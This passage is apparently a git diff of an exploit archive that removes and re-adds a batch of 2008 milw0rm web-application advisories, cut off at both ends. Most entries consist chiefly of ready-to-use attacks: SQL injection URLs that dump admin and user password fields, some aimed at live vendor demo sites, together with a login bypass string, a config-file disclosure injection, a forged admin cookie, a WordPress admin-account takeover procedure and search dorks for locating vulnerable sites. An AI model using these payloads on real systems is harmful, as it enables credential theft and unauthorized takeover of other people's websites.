Powered By AlstraSoft Forum Pay Per Post Exchange -# -# -# -# -# -# POC: For Admin id and pass -# index.php?menu=showcat&cat=-1+union+all+select+1,concat(auser,0x3a,apass),3+from+admin-- -# -# P0C-2: For Users id and pass -# index.php?menu=showcat&cat=-1+union+all+select+1,concat(username,0x3a,upass),3+from+users+limit+2,1-- -# -# Live Demo: (For admin) -# -# http://payperpostpro.com/index.php?menu=showcat&cat=-1+union+all+select+1,concat(auser,0x3a,apass),3+from+admin-- -# -# Live Demo: (For Users) -# http://payperpostpro.com/index.php?menu=showcat&cat=-1+union+all+select+1,concat(username,0x3a,upass),3+from+users+limit+1,1-- -# -# -# Admin panel is at http://site.com/admin -################################################################ -# Vuln Discovered 7th Sep 2008 - -# 
milw0rm.com [2008-09-07] +################################################################ +# .___ __ _______ .___ # +# __| _/____ _______| | __ ____ \ _ \ __| _/____ # +# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # +# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # +# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # +# \/ \/ \/ # +# ___________ ______ _ __ # +# _/ ___\_ __ \_/ __ \ \/ \/ / # +# \ \___| | \/\ ___/\ / # +# \___ >__| \___ >\/\_/ # +# est.2007 \/ \/ forum.darkc0de.com # +################################################################ +# --d3hydr8 - rsauron - baltazar - sinner_01 - C1c4Tr1Z - beenu# +# --- QKrun1x - skillfaker - FeDeReR - Optyx - Nuclear +# and all darkc0de members ---# +################################################################ +# +# Author: r45c4l and P47r1ck +# +# Home : www.darkc0de.com +# +# Email : r45c4l@hotmail.com, p47r1ckro[at]gmail[dot]com +# +# Share the c0de! +# +################################################################ +# +# Exploit: Altrasoft Forum (cat) Remote SQL Injection Vulnerability +# +# +# App Name: AlstraSoft Forum +# +# App Home: http://www.alstrasoft.com/ +# +# Dork: inurl:index.php?menu=showcat= +# Dork2: Powered By AlstraSoft Forum Pay Per Post Exchange +# +# +# +# +# +# POC: For Admin id and pass +# index.php?menu=showcat&cat=-1+union+all+select+1,concat(auser,0x3a,apass),3+from+admin-- +# +# P0C-2: For Users id and pass +# index.php?menu=showcat&cat=-1+union+all+select+1,concat(username,0x3a,upass),3+from+users+limit+2,1-- +# +# Live Demo: (For admin) +# +# http://payperpostpro.com/index.php?menu=showcat&cat=-1+union+all+select+1,concat(auser,0x3a,apass),3+from+admin-- +# +# Live Demo: (For Users) +# http://payperpostpro.com/index.php?menu=showcat&cat=-1+union+all+select+1,concat(username,0x3a,upass),3+from+users+limit+1,1-- +# +# +# Admin panel is at http://site.com/admin +################################################################ +# Vuln Discovered 7th Sep 2008 + +# 
milw0rm.com [2008-09-07] diff --git a/platforms/php/webapps/6397.txt b/platforms/php/webapps/6397.txt index 8bf1bedc4..0e75a7e6f 100755 --- a/platforms/php/webapps/6397.txt +++ b/platforms/php/webapps/6397.txt 
@@ -1,34 +1,34 @@
-# WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)
-#
-# found by irk4z[at]yahoo.pl
-# homepage: http://irk4z.wordpress.com/
-#
-# this is not critical vuln [;
-#
-# first, read this discovery:
-# http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
-#
-# in this hack we can remote change admin password, if registration enabled
-#
-# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends
-
-1. go to url: server.com/wp-login.php?action=register
-
-2. register as:
-
-login: admin x
-email: your email
-
-^ admin[55 space chars]x
-
-now, we have duplicated 'admin' account in database
-
-3. go to url: server.com/wp-login.php?action=lostpassword
-
-4. write your email into field and submit this form
-
-5. check your email and go to reset confirmation link
-
-6. admin's password changed, but new password will be send to correct admin email ;/
-
-# milw0rm.com [2008-09-07]
+# WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)
+#
+# found by irk4z[at]yahoo.pl
+# homepage: http://irk4z.wordpress.com/
+#
+# this is not critical vuln [;
+#
+# first, read this discovery:
+# http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
+#
+# in this hack we can remote change admin password, if registration enabled
+#
+# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends
+
+1. go to url: server.com/wp-login.php?action=register
+
+2. register as:
+
+login: admin x
+email: your email
+
+^ admin[55 space chars]x
+
+now, we have duplicated 'admin' account in database
+
+3. go to url: server.com/wp-login.php?action=lostpassword
+
+4. write your email into field and submit this form
+
+5. check your email and go to reset confirmation link
+
+6. admin's password changed, but new password will be send to correct admin email ;/
+
+# milw0rm.com [2008-09-07]
diff --git a/platforms/php/webapps/6398.txt b/platforms/php/webapps/6398.txt
index a83479ced..fa0516079 100755
--- a/platforms/php/webapps/6398.txt
+++ b/platforms/php/webapps/6398.txt
@@ -1,13 +1,13 @@
-ephpscripts SQL Injection
-Bug Founded By Mormoroth
-This Portal Isnt Free
-Sp TNX to : imm02rtal-Magicboy-Yashi Lashi-DJ7xpl-R$p And Others
-www.mormoroth.net
-www.shabgard.org
-dork : Powered by ephpscripts
-Exploit : Site.com/path/search_results.php?cid=-1/**/union/**/select/**/1,version(),3,4,5,6--
-exp:http://www.ephpscripts.com/demo/eshop/search_results.php?cid=-1/**/union/**/select/**/1,version(),3,4,5,6--
-Persian Gulf Forever
-Iraninan xxxers :D
-
-# milw0rm.com [2008-09-07]
+ephpscripts SQL Injection
+Bug Founded By Mormoroth
+This Portal Isnt Free
+Sp TNX to : imm02rtal-Magicboy-Yashi Lashi-DJ7xpl-R$p And Others
+www.mormoroth.net
+www.shabgard.org
+dork : Powered by ephpscripts
+Exploit : Site.com/path/search_results.php?cid=-1/**/union/**/select/**/1,version(),3,4,5,6--
+exp:http://www.ephpscripts.com/demo/eshop/search_results.php?cid=-1/**/union/**/select/**/1,version(),3,4,5,6--
+Persian Gulf Forever
+Iraninan xxxers :D
+
+# milw0rm.com [2008-09-07]
diff --git a/platforms/php/webapps/6401.txt b/platforms/php/webapps/6401.txt
index c7ceff2f8..e1db7ecc8 100755
--- a/platforms/php/webapps/6401.txt
+++ b/platforms/php/webapps/6401.txt
@@ -1,61 +1,61 @@ -################################################################ -# .___ __ _______ .___ # -# __| _/____ _______| | __ ____ \ _ \ __| _/____ # -# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # -# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # -# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # -# \/ \/ \/ # -# ___________ ______ _ __ # -# _/ ___\_ __ \_/ __ \ \/ \/ / # -# \ \___| | \/\ ___/\ / # -# \___ >__| \___ >\/\_/ # -# est.2007 \/ \/ forum.darkc0de.com # -################################################################ -# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu # -# ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE # -# and all darkc0de members ---# -################################################################ -# -# Author: r45c4l -# -# Home : www.darkc0de.com -# -# Email : r45c4l@hotmail.com -# -# Share the c0de! -# -################################################################ -# -# Exploit: Alstrasoft Forum (forum_catview&catid) Remote SQL Injection Vulnerability -# -# -# App Name: AlstraSoft Forum -# -# App Home: http://www.alstrasoft.com/ -# -# Dork1: Use ur brain -# Dork2: Powered By AlstraSoft Forum Pay Per Post Exchange -# -# -# -# -# -# POC: For Admin id and pass -# index.php?menu=forum_catview&catid=-1+union+all+select+1,2,3,4,5,concat(auser,0x3a,apass),7+from+admin-- -# -# P0C-2: For Users id and pass -# index.php?menu=forum_catview&catid=-1+union+all+select+1,2,3,4,5,concat(username,0x3a,upass),7+from+users-- -# -# Live Demo: (For admin) -# -# http://payperpostpro.com/index.php?menu=forum_catview&catid=-1+union+all+select+1,2,3,4,5,concat(auser,0x3a,apass),7+from+admin-- -# -# Live Demo: (For Users) -# -# http://payperpostpro.com/index.php?menu=forum_catview&catid=-1+union+all+select+1,2,3,4,5,concat(username,0x3a,upass),7+from+users-- -# -# Admin panel is at http://site.com/admin -################################################################ -# Vuln Discovered 9th Sep 2008 - -# milw0rm.com 
[2008-09-09] +################################################################ +# .___ __ _______ .___ # +# __| _/____ _______| | __ ____ \ _ \ __| _/____ # +# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # +# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # +# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # +# \/ \/ \/ # +# ___________ ______ _ __ # +# _/ ___\_ __ \_/ __ \ \/ \/ / # +# \ \___| | \/\ ___/\ / # +# \___ >__| \___ >\/\_/ # +# est.2007 \/ \/ forum.darkc0de.com # +################################################################ +# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu # +# ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE # +# and all darkc0de members ---# +################################################################ +# +# Author: r45c4l +# +# Home : www.darkc0de.com +# +# Email : r45c4l@hotmail.com +# +# Share the c0de! +# +################################################################ +# +# Exploit: Alstrasoft Forum (forum_catview&catid) Remote SQL Injection Vulnerability +# +# +# App Name: AlstraSoft Forum +# +# App Home: http://www.alstrasoft.com/ +# +# Dork1: Use ur brain +# Dork2: Powered By AlstraSoft Forum Pay Per Post Exchange +# +# +# +# +# +# POC: For Admin id and pass +# index.php?menu=forum_catview&catid=-1+union+all+select+1,2,3,4,5,concat(auser,0x3a,apass),7+from+admin-- +# +# P0C-2: For Users id and pass +# index.php?menu=forum_catview&catid=-1+union+all+select+1,2,3,4,5,concat(username,0x3a,upass),7+from+users-- +# +# Live Demo: (For admin) +# +# http://payperpostpro.com/index.php?menu=forum_catview&catid=-1+union+all+select+1,2,3,4,5,concat(auser,0x3a,apass),7+from+admin-- +# +# Live Demo: (For Users) +# +# http://payperpostpro.com/index.php?menu=forum_catview&catid=-1+union+all+select+1,2,3,4,5,concat(username,0x3a,upass),7+from+users-- +# +# Admin panel is at http://site.com/admin +################################################################ +# Vuln Discovered 9th Sep 2008 + +# milw0rm.com 
[2008-09-09]
diff --git a/platforms/php/webapps/6402.txt b/platforms/php/webapps/6402.txt
index 80fd786e5..e14a0856a 100755
--- a/platforms/php/webapps/6402.txt
+++ b/platforms/php/webapps/6402.txt
@@ -1,35 +1,35 @@ -##################################################################################### -#### Stash v1.0.3 Admin bypass / Remote File Disclosure #### -##################################################################################### -# # -#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # -#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # -#Our Site : Http://IRCRASH.COM # -#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) # -##################################################################################### -# # -#Download : http://kent.dl.sourceforge.net/sourceforge/nice-stash/stash-1.0.3.tar.gz# -# # -#DORK : :( # -# # -##################################################################################### -# [Admin by pass] # -# # -#http://Site/[path]/admin/login # -#Username : ' or 1=1/* # -#Password : R3d.W0rm # -# # -##################################################################################### -# [Remote File Disclosure] # -# # -#http://Site/[path]/downloadmp3.php?download=-99999'+union+select+0,1,2,3,4,concat(0x[file name in hex])/* -# # -#Note : You must enter file name in hex in valun address to download it . # -#Ex. 
../../admin/config.php == 2E2E2F2E2E2F61646D696E2F636F6E6669672E706870 # -#http://Site/[path]/downloadmp3.php?download=-99999'+union+select+0,1,2,3,4,concat(0x2E2E2F2E2E2F61646D696E2F636F6E6669672E706870)/* -# # -##################################################################################### -# Site : Http://IRCRASH.COM # -###################################### TNX GOD ###################################### - -# milw0rm.com [2008-09-09] +##################################################################################### +#### Stash v1.0.3 Admin bypass / Remote File Disclosure #### +##################################################################################### +# # +#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # +#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # +#Our Site : Http://IRCRASH.COM # +#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) # +##################################################################################### +# # +#Download : http://kent.dl.sourceforge.net/sourceforge/nice-stash/stash-1.0.3.tar.gz# +# # +#DORK : :( # +# # +##################################################################################### +# [Admin by pass] # +# # +#http://Site/[path]/admin/login # +#Username : ' or 1=1/* # +#Password : R3d.W0rm # +# # +##################################################################################### +# [Remote File Disclosure] # +# # +#http://Site/[path]/downloadmp3.php?download=-99999'+union+select+0,1,2,3,4,concat(0x[file name in hex])/* +# # +#Note : You must enter file name in hex in valun address to download it . # +#Ex. 
../../admin/config.php == 2E2E2F2E2E2F61646D696E2F636F6E6669672E706870 # +#http://Site/[path]/downloadmp3.php?download=-99999'+union+select+0,1,2,3,4,concat(0x2E2E2F2E2E2F61646D696E2F636F6E6669672E706870)/* +# # +##################################################################################### +# Site : Http://IRCRASH.COM # +###################################### TNX GOD ###################################### + +# milw0rm.com [2008-09-09] diff --git a/platforms/php/webapps/6403.txt b/platforms/php/webapps/6403.txt index 08fec73b7..1a65225c5 100755 --- a/platforms/php/webapps/6403.txt +++ b/platforms/php/webapps/6403.txt 
@@ -1,46 +1,46 @@ -########################################################### -# -# ___ __ __ __ __ -# /\_ \ /\ \\ \ /\ \/\ \ -# ____\//\ \ \ \ \\ \ __ _ __ _\ \ \ \ \ ____ -# /',__\ \ \ \ \ \ \\ \_ /\ \/'\\ \/'\\ \ \ \ \/\_ ,`\ -# /\__, `\ \_\ \_\ \__ ,__\\> <\\> <\\ \ \_\ \/_/ /_ -# \/\____/ /\____\\/_/\_\_//\_/\_\\_/\_\ \ \_____\/\____\ -# \/___/ \/____/ \/_/ \//\/_///\/_/ \/_____/\/____/ -# -# security breakd0wn! -########################################################### -# -# Title: Hot Links SQL-PHP 3 (report.php) Multiple Vulnerabilities -# Vendor: http://www.mrcgiguy.com -# Vulnerable Version: 3 and prior versions -# Fix: N/A -# -########################################################### -# -# c0ntact: sl4x.xuz[at]gmail[dot]com -# d0rk: "Powered By: Hot Links SQL-PHP 3" -# stop lammo -# -########################################################### - -###################### - 1. Information -###################### - Hot Links was the initial script developed by Mr CGI Guy back in 2001 as a simple way to manage outgoing links. It intially was introduced as Hot Links Lite and was distributed for free. - -###################### - 2. Vulnerabilities -###################### - SQL Injection in "report.php" in the "id" parameter. - Cross Site Scripting in "report.php" in the "id" parameter. - -###################### - 3. PoC -###################### - http://localhost/path/report.php?id=-1/**/union/**/select/**/version(),2,3-- - http://localhost/path/report.php?id=[XSS] - -########################################################### - -# milw0rm.com [2008-09-09] +########################################################### +# +# ___ __ __ __ __ +# /\_ \ /\ \\ \ /\ \/\ \ +# ____\//\ \ \ \ \\ \ __ _ __ _\ \ \ \ \ ____ +# /',__\ \ \ \ \ \ \\ \_ /\ \/'\\ \/'\\ \ \ \ \/\_ ,`\ +# /\__, `\ \_\ \_\ \__ ,__\\> <\\> <\\ \ \_\ \/_/ /_ +# \/\____/ /\____\\/_/\_\_//\_/\_\\_/\_\ \ \_____\/\____\ +# \/___/ \/____/ \/_/ \//\/_///\/_/ \/_____/\/____/ +# +# security breakd0wn! 
+########################################################### +# +# Title: Hot Links SQL-PHP 3 (report.php) Multiple Vulnerabilities +# Vendor: http://www.mrcgiguy.com +# Vulnerable Version: 3 and prior versions +# Fix: N/A +# +########################################################### +# +# c0ntact: sl4x.xuz[at]gmail[dot]com +# d0rk: "Powered By: Hot Links SQL-PHP 3" +# stop lammo +# +########################################################### + +###################### + 1. Information +###################### + Hot Links was the initial script developed by Mr CGI Guy back in 2001 as a simple way to manage outgoing links. It intially was introduced as Hot Links Lite and was distributed for free. + +###################### + 2. Vulnerabilities +###################### + SQL Injection in "report.php" in the "id" parameter. + Cross Site Scripting in "report.php" in the "id" parameter. + +###################### + 3. PoC +###################### + http://localhost/path/report.php?id=-1/**/union/**/select/**/version(),2,3-- + http://localhost/path/report.php?id=[XSS] + +########################################################### + +# milw0rm.com [2008-09-09] diff --git a/platforms/php/webapps/6404.txt b/platforms/php/webapps/6404.txt index 21cf3f8a2..0bf39411d 100755 --- a/platforms/php/webapps/6404.txt +++ b/platforms/php/webapps/6404.txt 
@@ -1,64 +1,63 @@ - - || || | || - o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, - ( : / (_) / ( . -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| -| _ __ __ __ ______ | -| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | -| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | -| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | -| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | -| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | -| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | -| \ \____/ >> Kings of injection | -| \/___/ | -| | -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| - - -<> Found by : Cyb3r-1sT - -<> C0ntact : cyb3r-1st [at] hotmail.com - -<> Groups : InjEctOr5 T3am - - -======================================================= -++++++++++++++++++++ Script information++++++++++++++++++++++ -======================================================= - - -<<->> script : live-tv-script - -<<->> script site : www.livetvscript.com - - - -======================================================= -++++++++++++++++++++++++ Exploit +++++++++++++++++++++++++ -======================================================= - - -<<->> D0rk : find it - -<<->> Exploit :>>> - - >>>> www.site.me/patch/index.php?mid=-99999+union+select+0,unhex(hex(concat(uid,0x3a,pwd))),0,0+from+admin/* - - -======================================================= -+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++ -======================================================= - - -<<->> freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker - anaconda-ksa $ sirus $ br1ght-dark $ Golden-zero $ crazy-x - - -<<->> InjEctOr5 TeaM freinds :: abo-najm $ Eng.Silent Night $ spid3r-net $ hacker-b0y $ qalbhamad $ Mr.Dangers - RooT-HacKer - 07 - fisher - ToTal - - - -<<->> All muslims - -# milw0rm.com [2008-09-09] + || || | || + o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, + ( : / (_) / ( . 
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| +| _ __ __ __ ______ | +| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | +| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | +| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | +| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | +| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | +| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | +| \ \____/ >> Kings of injection | +| \/___/ | +| | +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| + + +<> Found by : Cyb3r-1sT + +<> C0ntact : cyb3r-1st [at] hotmail.com + +<> Groups : InjEctOr5 T3am + + +======================================================= +++++++++++++++++++++ Script information++++++++++++++++++++++ +======================================================= + + +<<->> script : live-tv-script + +<<->> script site : www.livetvscript.com + + + +======================================================= +++++++++++++++++++++++++ Exploit +++++++++++++++++++++++++ +======================================================= + + +<<->> D0rk : find it + +<<->> Exploit :>>> + + >>>> www.site.me/patch/index.php?mid=-99999+union+select+0,unhex(hex(concat(uid,0x3a,pwd))),0,0+from+admin/* + + +======================================================= ++++++++++++++++++++++++ Greetz ++++++++++++++++++++++++ +======================================================= + + +<<->> freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker + anaconda-ksa $ sirus $ br1ght-dark $ Golden-zero $ crazy-x + + +<<->> InjEctOr5 TeaM freinds :: abo-najm $ Eng.Silent Night $ spid3r-net $ hacker-b0y $ qalbhamad $ Mr.Dangers - RooT-HacKer - 07 - fisher - ToTal + + + +<<->> All muslims + +# milw0rm.com [2008-09-09] diff --git a/platforms/php/webapps/6406.txt b/platforms/php/webapps/6406.txt index 3f09d68be..ed39f9443 100755 --- a/platforms/php/webapps/6406.txt 
+++ b/platforms/php/webapps/6406.txt 
@@ -1,37 +1,37 @@ - #################################################################################################### - # # - # ...:::::stash-1.0.3 Insecure Cookie Handling Vulnerability ::::.... # - ################################################################################################### - - ------------------------ -Discoverd By : Ciph3r - -special tnx to : Iranian hacker & Kurdish Security TEAM - -E-Mail : Ciph3r_blackhat@yahoo.com - -cms : http://sourceforge.net/project/showfiles.php?group_id=206129 ------------------------ -DESCRIPTION: - -stash-1.0.3, suffers from insecure cookie handling, when a admin login is successfull the script creates -a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt -contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are -logged in as a legit admin. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -vuln code in admin/login.php - - -if(isset($_COOKIE['bsm'])&&isset($_COOKIE['msb'])){ - $authenticate->checkCookie($_COOKIE['bsm'],$_COOKIE['msb']); - - ------------------------------------------ -exploit: -javascript:document.cookie = "bsm=1; path=/"; ------ -now you can get admin access and manage the cms ;) -------------------------------------------- - -# milw0rm.com [2008-09-09] + #################################################################################################### + # # + # ...:::::stash-1.0.3 Insecure Cookie Handling Vulnerability ::::.... 
# + ################################################################################################### + + +----------------------- +Discoverd By : Ciph3r + +special tnx to : Iranian hacker & Kurdish Security TEAM + +E-Mail : Ciph3r_blackhat@yahoo.com + +cms : http://sourceforge.net/project/showfiles.php?group_id=206129 +----------------------- +DESCRIPTION: + +stash-1.0.3, suffers from insecure cookie handling, when a admin login is successfull the script creates +a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt +contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are +logged in as a legit admin. +=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- +vuln code in admin/login.php + + +if(isset($_COOKIE['bsm'])&&isset($_COOKIE['msb'])){ + $authenticate->checkCookie($_COOKIE['bsm'],$_COOKIE['msb']); + + +----------------------------------------- +exploit: +javascript:document.cookie = "bsm=1; path=/"; +----- +now you can get admin access and manage the cms ;) +------------------------------------------- + +# milw0rm.com [2008-09-09] diff --git a/platforms/php/webapps/6408.txt b/platforms/php/webapps/6408.txt index 24a6c34f8..57fb2cfb0 100755 --- a/platforms/php/webapps/6408.txt +++ b/platforms/php/webapps/6408.txt 
@@ -1,51 +1,51 @@ -################################################################################################# -#################################### proud to be muslim ###################################### -### ### -### rEm0te sql injction VulnErability ### -### ### -### (cmsbuzz script) ### -### ### -################################################################################################# -################################################################################################# -### ### -### AuTh0r : security fears team ### -### ### -### Home : WwW.alsonaa.com ### -### ### -### members: HeB4RieH , germaya_x ### -### ### -################################################################################################# -################################################################################################# -### ### -### Script Name : cmsbuzz ### -### ### -### download : http://cmsbuzz.com/purchase.php ### -### ### -### Email : s-fteam@securityfears.cc ### -################################################################################################# -################################################################################################# -### ### -### d0rk :: "use your mind" ### -### ### -### ### -### -(:: sql Code ::)- ### -### ?action=playgame&id=(sql) ### -###(sql)=-6+union+select+1,2,3,concat_ws(0x3a3a,username,upasswd),5,6,7,8,9,10,11,12,13+from+tbl_userprofile-- -### ### -################################################################################################# -### ### -### -(:: l!ve demo ::)- ### -### ### -###http://demo.cmsbuzz.com/?action=playgame&id=-6+union+select+1,2,3,concat_ws(0x3a3a,username,upasswd),5,6,7,8,9,10,11,12,13+from+tbl_userprofile-- -### ### -### ### -######################## ##################### -######################## ##################### -################################################################################################# 
-################################################################################################# - -(:: !GreTzZ! ::)- - ::SnIpEr.KiLLeR::fa6al error::black cheetah::X_HaCker::str0ke::MusliMs HaCkErs:: -################################################################################################# -################################################################################################# - -# milw0rm.com [2008-09-09] +################################################################################################# +#################################### proud to be muslim ###################################### +### ### +### rEm0te sql injction VulnErability ### +### ### +### (cmsbuzz script) ### +### ### +################################################################################################# +################################################################################################# +### ### +### AuTh0r : security fears team ### +### ### +### Home : WwW.alsonaa.com ### +### ### +### members: HeB4RieH , germaya_x ### +### ### +################################################################################################# +################################################################################################# +### ### +### Script Name : cmsbuzz ### +### ### +### download : http://cmsbuzz.com/purchase.php ### +### ### +### Email : s-fteam@securityfears.cc ### +################################################################################################# +################################################################################################# +### ### +### d0rk :: "use your mind" ### +### ### +### ### +### -(:: sql Code ::)- ### +### ?action=playgame&id=(sql) ### +###(sql)=-6+union+select+1,2,3,concat_ws(0x3a3a,username,upasswd),5,6,7,8,9,10,11,12,13+from+tbl_userprofile-- +### ### +################################################################################################# +### ### +### -(:: l!ve demo ::)- ### +### 
### +###http://demo.cmsbuzz.com/?action=playgame&id=-6+union+select+1,2,3,concat_ws(0x3a3a,username,upasswd),5,6,7,8,9,10,11,12,13+from+tbl_userprofile-- +### ### +### ### +######################## ##################### +######################## ##################### +################################################################################################# +################################################################################################# + -(:: !GreTzZ! ::)- + ::SnIpEr.KiLLeR::fa6al error::black cheetah::X_HaCker::str0ke::MusliMs HaCkErs:: +################################################################################################# +################################################################################################# + +# milw0rm.com [2008-09-09] diff --git a/platforms/php/webapps/6409.txt b/platforms/php/webapps/6409.txt index 02386215d..eded6f099 100755 --- a/platforms/php/webapps/6409.txt +++ b/platforms/php/webapps/6409.txt 
@@ -1,46 +1,46 @@ -########################################################### -# -# ___ __ __ __ __ -# /\_ \ /\ \\ \ /\ \/\ \ -# ____\//\ \ \ \ \\ \ __ _ __ _\ \ \ \ \ ____ -# /',__\ \ \ \ \ \ \\ \_ /\ \/'\\ \/'\\ \ \ \ \/\_ ,`\ -# /\__, `\ \_\ \_\ \__ ,__\\> <\\> <\\ \ \_\ \/_/ /_ -# \/\____/ /\____\\/_/\_\_//\_/\_\\_/\_\ \ \_____\/\____\ -# \/___/ \/____/ \/_/ \//\/_///\/_/ \/_____/\/____/ -# -# security breakd0wn! -########################################################### -# -# Title: Availscript Article Script (articles.php) Multiple Vulnerabilities -# Vendor: http://www.availscript.com/ -# Vulnerable Version: N/A -# Fix: N/A -# -########################################################### -# -# c0ntact: sl4x.xuz[at]gmail[dot]com -# d0rk: "assh0le" -# stop lammo -# -########################################################### - -###################### - 1. Information -###################### - Article Script allows you to publish your own articles or from the publishers or authors. Aministrator can go to admin page to edit, delete or manage articles, authors and categories. and the member can post articles as an author or just can read the articles. - -###################### - 2. Vulnerabilities -###################### - SQL Injection in "articles.php" in the "aIDS" parameter. - Cross Site Scripting in "articles.php" in the "aIDS" parameter. - -###################### - 3. 
PoC -###################### - http://localhost/path/articles.php?aIDS=-1+union+select+1,2,user()-- - http://localhost/path/articles.php?aIDS=[XSS] - -########################################################### - -# milw0rm.com [2008-09-09] +########################################################### +# +# ___ __ __ __ __ +# /\_ \ /\ \\ \ /\ \/\ \ +# ____\//\ \ \ \ \\ \ __ _ __ _\ \ \ \ \ ____ +# /',__\ \ \ \ \ \ \\ \_ /\ \/'\\ \/'\\ \ \ \ \/\_ ,`\ +# /\__, `\ \_\ \_\ \__ ,__\\> <\\> <\\ \ \_\ \/_/ /_ +# \/\____/ /\____\\/_/\_\_//\_/\_\\_/\_\ \ \_____\/\____\ +# \/___/ \/____/ \/_/ \//\/_///\/_/ \/_____/\/____/ +# +# security breakd0wn! +########################################################### +# +# Title: Availscript Article Script (articles.php) Multiple Vulnerabilities +# Vendor: http://www.availscript.com/ +# Vulnerable Version: N/A +# Fix: N/A +# +########################################################### +# +# c0ntact: sl4x.xuz[at]gmail[dot]com +# d0rk: "assh0le" +# stop lammo +# +########################################################### + +###################### + 1. Information +###################### + Article Script allows you to publish your own articles or from the publishers or authors. Aministrator can go to admin page to edit, delete or manage articles, authors and categories. and the member can post articles as an author or just can read the articles. + +###################### + 2. Vulnerabilities +###################### + SQL Injection in "articles.php" in the "aIDS" parameter. + Cross Site Scripting in "articles.php" in the "aIDS" parameter. + +###################### + 3. PoC +###################### + http://localhost/path/articles.php?aIDS=-1+union+select+1,2,user()-- + http://localhost/path/articles.php?aIDS=[XSS] + +########################################################### + +# milw0rm.com [2008-09-09] diff --git a/platforms/php/webapps/6411.txt b/platforms/php/webapps/6411.txt index 29a195f94..69b033f10 100755 
--- a/platforms/php/webapps/6411.txt
+++ b/platforms/php/webapps/6411.txt
@@ -1,48 +1,48 @@ -########################################################### -# -# ___ __ __ __ __ -# /\_ \ /\ \\ \ /\ \/\ \ -# ____\//\ \ \ \ \\ \ __ _ __ _\ \ \ \ \ ____ -# /',__\ \ \ \ \ \ \\ \_ /\ \/'\\ \/'\\ \ \ \ \/\_ ,`\ -# /\__, `\ \_\ \_\ \__ ,__\\> <\\> <\\ \ \_\ \/_/ /_ -# \/\____/ /\____\\/_/\_\_//\_/\_\\_/\_\ \ \_____\/\____\ -# \/___/ \/____/ \/_/ \//\/_///\/_/ \/_____/\/____/ -# -# security breakd0wn! -########################################################### -# -# Title: Availscript Photo Album (pics.php) Multiple Vulnerabilities -# Vendor: http://www.availscript.com/ -# Vulnerable Version: N/A -# Fix: N/A -# -########################################################### -# -# c0ntact: sl4x.xuz[at]gmail[dot]com -# d0rk: "muahaha" -# stop lammo -# -########################################################### - -###################### - 1. Information -###################### - With this script you can add pictures in categories create album or wallpaper website. - -###################### - 2. Vulnerabilities -###################### 